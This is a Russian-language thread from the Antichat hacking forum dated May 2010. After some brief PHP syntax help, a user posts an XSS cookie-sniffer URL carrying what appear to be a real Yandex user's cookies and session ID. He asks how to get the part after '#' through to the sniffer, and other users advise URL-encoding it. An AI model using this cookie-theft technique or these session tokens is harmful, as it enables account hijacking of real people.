Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|

03.05.2010, 00:16
|
|
Постоянный
Регистрация: 08.11.2008
Сообщений: 498
Провел на форуме: 2603363
Репутация:
278
|
|
Rew не код, а какой-то мистический кусок дерьма
|
|
|

03.05.2010, 00:19
|
|
Новичок
Регистрация: 29.03.2010
Сообщений: 13
Провел на форуме: 41962
Репутация:
5
|
|
Сообщение от Deathdreams
Rew не код, а какой-то мистический кусок дерьма
Ну, вот и валится мистическим образом...
- начать следует с этого - это просто, эммм..., просто что-то невообразимое...
|
|
|

03.05.2010, 00:47
|
|
Новичок
Регистрация: 12.03.2010
Сообщений: 13
Провел на форуме: 29188
Репутация:
0
|
|
Может так будет понятней Посмотреть код php
Строка
960 $j <= $enpages_count; ++$j )
958 for ( ; do
|
|
|

03.05.2010, 00:51
|
|
Новичок
Регистрация: 29.03.2010
Сообщений: 13
Провел на форуме: 41962
Репутация:
5
|
|
Знаю, как иногда бесит, но всё же - почитай http://wcode.ru/php/89/
958 for ( ; do - 100% ошибка в синтаксисе
|
|
|

03.05.2010, 13:09
|
|
Новичок
Регистрация: 29.03.2010
Сообщений: 13
Провел на форуме: 41962
Репутация:
5
|
|
А в чём проблема-то?
|
|
|

03.05.2010, 13:25
|
|
Новичок
Регистрация: 29.03.2010
Сообщений: 13
Провел на форуме: 41962
Репутация:
5
|
|
Подробнее опиши, плз, "как не работает" =)))) Что за ошибку вываливает?
|
|
|

03.05.2010, 14:27
|
|
Участник форума
Регистрация: 27.12.2009
Сообщений: 126
Провел на форуме: 1170081
Репутация:
63
|
|
dimm666, уже сделал 
|
|
|

03.05.2010, 15:09
|
|
Участник форума
Регистрация: 03.06.2008
Сообщений: 174
Провел на форуме: 2902191
Репутация:
45
|
|
Есть хсс
Есть снифер
На снифер передаются куки , ссылка выглядит так:
_http://ССЫЛКО/sn.php?yandex_login=o95;%20yandexuid=5892375125079 1393;%20yabs-frequency=/2/wmcA02y68KThf00l1e43QwG0BmQ10Mka02y6WQBWf00l1c47JQ K0BmQ7//fG8l1XM00mA10O81WG610O410W40;%20yp=2145906000.gp.5 5_753559%3A37_609218%3A1%3A10;%20L=S3sTUXMIQUdxRlB ee3deB1h6Q2hYYVN5JUJfSQovfC5jBA8VBVdDLVEOF0lBOV0Ee WAfShADEVAqFy9bUn8ZGA==.1272878138.7201.293812.f4c a1e10f2e45600466e765012ad9a31;%20fuid01=4abdde7e07 0c5080.5iwiwpzkVN5Y4k362Ky704-x1I420_T3aqYfA6MbzZOgdvG_5Gsz79IN0YZvroSqVi1IuecsY R06d_2vK99HJfqP0bZ37bLyAjX7uOOJ1CELN6QBJfHVqdpb91m t5_ZS;%20aw=1_teJxSYGLAChixC2NVxzGHgeGdEgNDtRaxukY BMgBFASj8vJUgYQkDoPCEheim#ZXeu9/wMBuXZgM4uY2AIAAAD//wMAQGAStQAA#A#;%20Session_id=1272881349.0.0.305950 .2:7517235:310.8:1272878138970:1595452327:15.66384 .6361.fc22404dace6eb5e4d84be6e5a37b849
Снифер принимает эти все данные и ВНИМАНИЕ ЗАПИСЫВАЕТ ТОЛЬКО ЛИШЬ ВОТ ЭТО:
yandex_login=o95;%20yandexuid=58923751250791393;%2 0yabs-frequency=/2/wmcA02y68KThf00l1e43QwG0BmQ10Mka02y6WQBWf00l1c47JQ K0BmQ7//fG8l1XM00mA10O81WG610O410W40;%20yp=2145906000.gp.5 5_753559%3A37_609218%3A1%3A10;%20L=S3sTUXMIQUdxRlB ee3deB1h6Q2hYYVN5JUJfSQovfC5jBA8VBVdDLVEOF0lBOV0Ee WAfShADEVAqFy9bUn8ZGA==.1272878138.7201.293812.f4c a1e10f2e45600466e765012ad9a31;%20fuid01=4abdde7e07 0c5080.5iwiwpzkVN5Y4k362Ky704-x1I420_T3aqYfA6MbzZOgdvG_5Gsz79IN0YZvroSqVi1IuecsY R06d_2vK99HJfqP0bZ37bLyAjX7uOOJ1CELN6QBJfHVqdpb91m t5_ZS;%20aw=1_teJxSYGLAChixC2NVxzGHgeGdEgNDtRaxukY BMgBFASj8vJUgYQkDoPCEheim
Записывает все , ДО символа # , а самая главная то строчка Session ID , а она после решетки , и соответсвенно не передается на сниф
Как сделать так чтобы , ссесиод ид передался на сниф?
|
|
|

03.05.2010, 15:17
|
|
Он хакер.
Регистрация: 01.11.2008
Сообщений: 1,756
Провел на форуме: 6462214
Репутация:
3171
|
|
Сообщение от crackmail
Есть хсс
Есть снифер
На снифер передаются куки , ссылка выглядит так:
Снифер принимает эти все данные и ВНИМАНИЕ ЗАПИСЫВАЕТ ТОЛЬКО ЛИШЬ ВОТ ЭТО:
Записывает все , ДО символа # , а самая главная то строчка Session ID , а она после решетки , и соответсвенно не передается на сниф
Как сделать так чтобы , ссесиод ид передался на сниф?
Мб решетку urlencode? Хотя хз, сам xss не люблю, и стараюсь не юзать ^_^
|
|
|

03.05.2010, 15:35
|
|
Новичок
Регистрация: 11.11.2008
Сообщений: 18
Провел на форуме: 295080
Репутация:
17
|
|
crackmail, да, нужно кодировать всю строку.
m0Hze, ой, какие мы гордые гуру, хсс мы не любим11
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|